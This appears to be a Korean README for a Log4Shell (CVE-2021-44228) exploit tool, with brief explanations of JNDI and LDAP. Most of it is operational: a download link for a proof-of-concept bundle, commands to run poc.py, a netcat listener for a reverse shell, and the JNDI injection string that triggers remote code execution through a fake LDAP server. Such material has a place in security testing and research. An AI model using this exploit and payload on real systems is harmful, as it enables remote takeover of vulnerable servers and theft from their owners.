
CVE-2021-44228(Log4Shell)용 익스플로잇 도구로, 악성 LDAP 서버를 설정하고 Java 페이로드를 전달하여 취약한 Log4j 응용 프로그램에서 원격 코드 실행을 달성합니다.
Log4j-Exploit-CVE-2021-44228
Log4Shell 취약점 테스트 도구 https://log4shell.tools/
Java가 이미 포함된 익스플로잇, 계정 생성 등을 피하기 위해
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
log4j 기본 개념
JNDI란 무엇인가
JNDI는 이름을 통해 데이터와 리소스를 검색하고 조회할 수 있도록 하는 자바 소프트웨어 클라이언트용 디렉터리 서비스 API입니다.
LDAP란 무엇인가
LDAP는 디렉터리 액세스 프로토콜로, Docker, Jenkins, Kubernetes, Open VPN, Linux Samba 서버와 함께 사용자 이름과 비밀번호를 검증하는 데 사용될 수 있습니다. LDAP SSO(Single Sign-On)는 시스템 관리자가 LDAP 데이터베이스에 대한 접근을 제어하는 데에도 사용될 수 있습니다.
취약점에 대해 더 알고 싶다면 아래 문서를 참조하세요:
https://www.lunasec.io/docs/blog/log4j-zero-day/
JAVA 미포함 익스플로잇